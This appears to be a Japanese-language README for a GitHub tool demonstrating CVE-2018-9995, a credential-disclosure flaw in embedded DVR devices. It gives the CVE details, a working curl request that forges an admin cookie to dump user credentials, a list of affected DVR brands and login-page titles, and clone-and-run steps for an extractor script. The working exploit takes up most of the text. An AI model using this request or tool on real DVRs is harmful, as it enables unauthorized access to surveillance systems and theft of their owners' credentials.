
このプロジェクトは、複数の組み込みDVRデバイスで発見された公開済みのCVE-2018-9995脆弱性を実証します。
[*] 元のツール: https://github.com/ezelf/CVE-2018-9995_dvr_credentials
[*] エクスプロイトタイトル: "Gets DVR Credentials"
[*] CVE: CVE-2018-9995
[*] CVSS基本値v3: 7.3 / 10
[*] CVSSベクター文字列: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
[*] 日付: 09/04/2018
[*] エクスプロイト作者: Fernandez Ezequiel ( twitter:@capitan_alfa )
.

$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (タイトル: "XVR Login")
Securus, - Security. Never Compromise !! -
Night OWL
DVR Login
HVR Login
MDVR Login



usr@pwn:~$ git clone https://github.com/F7P-H4NN1B4L/CVE-2018-9995-DVR-Credentials-Extractor
usr@pwn:~$ cd CVE-2018-9995-DVR-Credentials-Extractor
usr@pwn:~$ pip install -r requirements.txt
usr@pwn:~$ python main.py

http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html
見つけた...! xd